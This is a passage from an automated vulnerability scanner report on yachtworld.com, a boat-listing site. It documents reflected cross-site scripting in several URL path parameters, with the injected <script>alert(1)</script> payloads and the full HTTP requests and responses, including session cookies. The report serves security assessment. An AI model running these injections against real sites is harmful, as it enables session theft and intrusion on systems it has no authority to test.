%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&144cb"><script>alert(1)</script>523d00231bb=1&units=Feet&seo=0&checked_boats=2152119&boat_id=2152119&back=/core/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico&boat_id=2152119">
...[SNIP]...

3.105. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c18fb"><script>alert(1)</script>57c0f7d000b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32cc-2141315/Orange-Beachc18fb"><script>alert(1)</script>57c0f7d000b/AL/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:24 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 23:08:20 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:24 GMT
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2141315&boat_id=2141315&back=/core/boats/2004/Regulator-32cc-2141315/Orange-Beachc18fb"><script>alert(1)</script>57c0f7d000b/AL/United-States&boat_id=2141315">
...[SNIP]...

3.106. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30a83"><script>alert(1)</script>62580daf9dc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL30a83"><script>alert(1)</script>62580daf9dc/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:08 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 23:08:20 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:08 GMT
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2141315&boat_id=2141315&back=/core/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL30a83"><script>alert(1)</script>62580daf9dc/United-States&boat_id=2141315">
...[SNIP]...

3.107. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f083"><script>alert(1)</script>b717be1f98b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States3f083"><script>alert(1)</script>b717be1f98b HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:31 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 23:08:20 GMT
Content-Language: en-US
